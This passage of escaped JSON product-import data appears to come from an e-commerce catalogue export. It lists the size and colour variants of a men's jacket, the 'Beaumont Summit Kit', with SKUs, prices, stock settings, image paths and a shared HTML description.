Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"211\":{\"sku\":\"MJ01-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-S-Orange\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"212\":{\"sku\":\"MJ01-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-S-Red\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"213\":{\"sku\":\"MJ01-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-S-Yellow\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"214\":{\"sku\":\"MJ01-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-M-Orange\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"215\":{\"sku\":\"MJ01-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-M-Red\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"216\":{\"sku\":\"MJ01-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-M-Yellow\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"217\":{\"sku\":\"MJ01-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-L-Orange\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"218\":{\"sku\":\"MJ01-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-L-Red\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"219\":{\"sku\":\"MJ01-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default 